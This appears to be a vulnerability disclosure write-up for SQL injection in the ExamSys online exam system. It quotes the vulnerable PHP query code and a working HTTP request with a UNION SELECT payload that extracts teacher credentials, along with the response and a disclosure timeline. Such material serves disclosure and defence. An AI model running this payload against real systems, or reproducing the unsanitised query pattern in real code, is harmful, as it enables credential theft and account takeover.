ExamSys — Multiple SQL Injections

ExamSys is an open source online exam system. During a routine scan through GitHub, this repository was found vulnerable to multiple SQL Injections (SQLi) in all its SQL statements. It allows an attacker to receive user information like passwords or grades.

The vulnerability was assigned CVE-2023–55285 and affects the current version v1.0.0. No fixed version is available.
CVSS 9.1 AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N

This CVE was also part of a little experiment wrote down in the article below.

How to Get CVEs Online (Fast)

Example Attack

As all SQL statements are vulnerable to SQLi, this report gives only one example of an attack. The vulnerable code for this example can be found in the file Pages.php:

ExamSys/ExamSys/Support/action/Pages.php at master · lrx0014/ExamSys

The code takes the user provided POST parameters and puts them into the SQL statement’s where condition. Later this statement is executed returning the results as JSON.

if (isset($_POST['s_score2']) && $_POST['s_score2']!="") {
    $score2 = $_POST['s_score2'];
} else {
    $score2 = '9999';
}

$sql1 = "
    Select StuId, StuName,lastTime,total
    from gradeview
    Where StuName LIKE '".$name."'
    And StuId LIKE '".$id."'
    And total BETWEEN '".$score1."' And '".$score2."' limit $offset,$perPageNums;";

$sql2 = "select count(*) count from gradeview
    where StuName LIKE '".$name."'
    And StuId LIKE '".$id."'
    And total BETWEEN '".$score1."' And '".$score2."';";

$resource1 = mysql_query($sql1);
$resource2 = mysql_query($sql2);
$count = mysql_fetch_assoc($resource2);
while ($row = mysql_fetch_assoc($resource1)) {
    $result[] = $row;
}
echo json_encode(array('datas' => $result,'total' => $count['count']));

The following example request escapes the condition and uses an UNION SELECT to receive the ID, name, and password of all teachers.

POST /Support/action/Pages.php HTTP/1.1
Host: localhost
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Content-Length: 130

currentPage=1
&s_id=1
&s_name=a
&s_score1=
&s_score2='+UNION+SELECT+TeacherId,TeacherName,TeacherPassword,-1+FROM+teacher;--+-

As expected, the response contains the sensitive information. Since the password hashing is executed on the client side, the hashed password is enough to login.

HTTP/1.1 200 OK
Date: Sun, 07 Jan 2024 11:24:58 GMT
Server: Apache/2.4.7 (Ubuntu)
X-Powered-By: PHP/5.5.9-1ubuntu4.14
Vary: Accept-Encoding
Content-Length: 223
Content-Type: text/html;charset=utf-8

{
  "datas":[{
    "StuId":"1234",
    "StuName":"MrTeacher",
    "lastTime":"9a84ee41aa72de59c63006aad670bcce",
    "total":"-1"
 },{
    "StuId":"1235",
    "StuName":"GreatTeacher",
    "lastTime":"148e2b41aa72de59c6356haad670baec",
    "total":"-1"
  }],
  "total":null
}

Disclosing Timeline

Since a Shodan scan showed no public facing instances of this application, it was decided to wait for the CVE response from Mitre and notify the developer afterwards.

27.09.2023: Vulnerability discovered and CVE requested
31.12.2023: CVE assigned
07.01.2024: Vendor was notified
14.01.2024: Publicly disclosed